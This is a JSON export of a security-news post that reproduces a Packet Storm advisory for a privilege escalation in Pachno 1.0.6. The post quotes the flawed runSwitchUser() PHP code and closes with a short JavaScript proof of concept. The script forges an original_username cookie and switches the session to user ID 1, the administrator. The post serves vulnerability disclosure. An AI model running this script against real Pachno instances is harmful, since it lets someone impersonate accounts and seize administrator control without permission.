{"id":46371,"date":"2026-04-13T13:52:27","date_gmt":"2026-04-13T13:52:27","guid":{"rendered":"http:\/\/localhost\/?p=46371"},"modified":"2026-04-13T13:52:27","modified_gmt":"2026-04-13T13:52:27","slug":"pachno-106-privilege-escalation","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=46371","title":{"rendered":"\ud83d\udcc4 Pachno 1.0.6 Privilege Escalation_PACKETSTORM:218859"},"content":{"rendered":"

{“lastseen”:”2026-04-13T17:44:38″,”description”:”The authorization check in the runSwitchUser action in Pachno version 1.0.6 evaluates the expression !canSaveConfiguration \\u0026\\u0026 !hasCookie’originalusername’ and only forbids the request when both subexpressions are true. The presence of the…”,”published”:”2026-04-13T00:00:00″,”modified”:”2026-04-13T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Pachno 1.0.6 Privilege Escalation”,”source”:””,”references”:””,”id”:”PACKETSTORM:218859″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”Pachno 1.0.6 (runSwitchUser()) Remote Vertical Privilege Escalation\\n \\n \\n Vendor: Daniel Andr\u00e9 Eikeland\\n Product web page: https:\/\/github.com\/pachno\/pachno\\n Affected version: 1.0.6\\n \\n Summary: Pachno is an open-source collaboration platform (formerly known as The Bug\\n Genie) designed for team project management, issue tracking, and documentation. It\\n offers a module-based, customizable environment for software development and team\\n workflows, distributed under the Mozilla Public License.\\n \\n Desc: The authorization check in the runSwitchUser() action evaluates the expression\\n !canSaveConfiguration() \\u0026\\u0026 !hasCookie(‘original_username’) and only forbids the request\\n when both subexpressions are true. The presence of the original_username cookie is\\n sufficient to satisfy the second condition, and that cookie is fully client-controlled.\\n An authenticated low-privilege user who sets original_username to any value and then\\n issues a request to switch to user ID 1 receives a fresh session token (token authentication)\\n or password hash cookie (password authentication) belonging to the target user. This\\n can be exploited to elevate privileges to administrator and impersonate arbitrary user\\n accounts.\\n \\n =====================================================================================\\n \/core\/modules\/auth\/controllers\/Authentication.php:\\n ————————————————–\\n \/**\\n * Switch user action\\n *\\n * @Route(name=\\”switch_to_user\\”, url=\\”\/userswitch\/switch\/:user_id\/:csrf_token\\”)\\n * @CsrfProtected\\n *\\n * @param framework\\\\Request $request\\n *\/\\n public function runSwitchUser(framework\\\\Request $request)\\n {\\n if (!$this-\\u003egetUser()-\\u003ecanSaveConfiguration() \\u0026\\u0026 !$request-\\u003ehasCookie(‘original_username’))\\n return $this-\\u003eforward403();\\n \\n $response = $this-\\u003egetResponse();\\n $authentication_backend = framework\\\\Settings::getAuthenticationBackend();\\n if ($request[‘user_id’]) {\\n $user = new entities\\\\User($request[‘user_id’]);\\n if ($authentication_backend-\\u003egetAuthenticationMethod() == framework\\\\AuthenticationBackend::AUTHENTICATION_TYPE_TOKEN) {\\n $response-\\u003esetCookie(‘original_username’, $request-\\u003egetCookie(‘username’));\\n $response-\\u003esetCookie(‘original_session_token’, $request-\\u003egetCookie(‘session_token’));\\n framework\\\\Context::getResponse()-\\u003esetCookie(‘username’, $user-\\u003egetUsername());\\n framework\\\\Context::getResponse()-\\u003esetCookie(‘session_token’, $user-\\u003ecreateUserSession()-\\u003egetToken());\\n } else {\\n $response-\\u003esetCookie(‘original_username’, $request-\\u003egetCookie(‘username’));\\n $response-\\u003esetCookie(‘original_password’, $request-\\u003egetCookie(‘password’));\\n framework\\\\Context::getResponse()-\\u003esetCookie(‘password’, $user-\\u003egetHashPassword());\\n framework\\\\Context::getResponse()-\\u003esetCookie(‘username’, $user-\\u003egetUsername());\\n }\\n } else {\\n if ($authentication_backend-\\u003egetAuthenticationMethod() == framework\\\\AuthenticationBackend::AUTHENTICATION_TYPE_TOKEN) {\\n $response-\\u003esetCookie(‘username’, $request-\\u003egetCookie(‘original_username’));\\n $response-\\u003esetCookie(‘session_token’, $request-\\u003egetCookie(‘original_session_token’));\\n framework\\\\Context::getResponse()-\\u003edeleteCookie(‘original_session_token’);\\n framework\\\\Context::getResponse()-\\u003edeleteCookie(‘original_username’);\\n } else {\\n $response-\\u003esetCookie(‘username’, $request-\\u003egetCookie(‘original_username’));\\n $response-\\u003esetCookie(‘password’, $request-\\u003egetCookie(‘original_password’));\\n framework\\\\Context::getResponse()-\\u003edeleteCookie(‘original_password’);\\n framework\\\\Context::getResponse()-\\u003edeleteCookie(‘original_username’);\\n }\\n }\\n $this-\\u003eforward($this-\\u003egetRouting()-\\u003egenerate(‘home’));\\n }\\n =====================================================================================\\n \\n Tested on: GNU\/Linux\\n Apache2\\n PHP\/7.4\\n MySQL\/5.7 (MariaDB)\\n \\n \\n Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic\\n @zeroscience\\n \\n \\n Advisory ID: ZSL-2026-5985\\n Advisory URL: https:\/\/www.zeroscience.mk\/#\/advisories\/ZSL-2026-5985\\n \\n \\n 06.04.2026\\n \\n –\\n \\n \\n document.cookie = \\”original_username=liquidworm; path=\/\\”;\\n \\n const csrf = document.querySelector(‘input[name=\\”csrf_token\\”]’)?.value\\n || document.querySelector(‘meta[name=\\”csrf-token\\”]’)?.content;\\n \\n fetch(‘\/switch_user’, {\\n method: ‘POST’,\\n credentials: ‘include’,\\n headers: { ‘Content-Type’: ‘application\/x-www-form-urlencoded’,\\n ‘User-Agent’ : ‘AuthorizationBypassium\/1.12.04’ },\\n body: `user_id=1\\u0026csrf_token=${encodeURIComponent(csrf)}`\\n }).then(() =\\u003e {\\n window.location.href = ‘\/configure’;\\n });\\n \/\/ If you ‘see’ \/configure, you are admin.”,”sourceHref”:”https:\/\/packetstorm.news\/download\/218859″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/218859\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-04-13T17:44:38″,”description”:”The authorization check in the runSwitchUser action in Pachno version 1.0.6 evaluates the expression !canSaveConfiguration \\u0026\\u0026 !hasCookie’originalusername’ and only forbids the request when both subexpressions…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-46371","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Pachno 1.0.6 Privilege Escalation_PACKETSTORM:218859 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=46371\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Pachno 1.0.6 Privilege Escalation_PACKETSTORM:218859 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-04-13T17:44:38″,”description”:”The authorization check in the runSwitchUser action in Pachno version 1.0.6 evaluates the expression !canSaveConfiguration u0026u0026 !hasCookie’originalusername’ and only forbids the request when both subexpressions...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=46371\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-13T13:52:27+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46371#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46371\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Pachno 1.0.6 Privilege Escalation_PACKETSTORM:218859\",\"datePublished\":\"2026-04-13T13:52:27+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46371\"},\"wordCount\":736,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=46371#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46371\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46371\",\"name\":\"\ud83d\udcc4 Pachno 1.0.6 Privilege Escalation_PACKETSTORM:218859 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-13T13:52:27+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46371#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=46371\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46371#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Pachno 1.0.6 Privilege Escalation_PACKETSTORM:218859\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Pachno 1.0.6 Privilege Escalation_PACKETSTORM:218859 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=46371","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Pachno 1.0.6 Privilege Escalation_PACKETSTORM:218859 - zero redgem","og_description":"{“lastseen”:”2026-04-13T17:44:38″,”description”:”The authorization check in the runSwitchUser action in Pachno version 1.0.6 evaluates the expression !canSaveConfiguration u0026u0026 !hasCookie’originalusername’ and only forbids the request when both subexpressions...","og_url":"https:\/\/zero.redgem.net\/?p=46371","og_site_name":"zero redgem","article_published_time":"2026-04-13T13:52:27+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=46371#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=46371"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Pachno 1.0.6 Privilege Escalation_PACKETSTORM:218859","datePublished":"2026-04-13T13:52:27+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=46371"},"wordCount":736,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=46371#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=46371","url":"https:\/\/zero.redgem.net\/?p=46371","name":"\ud83d\udcc4 Pachno 1.0.6 Privilege Escalation_PACKETSTORM:218859 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-13T13:52:27+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=46371#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=46371"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=46371#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Pachno 1.0.6 Privilege Escalation_PACKETSTORM:218859"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/46371","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=46371"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/46371\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=46371"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=46371"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=46371"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}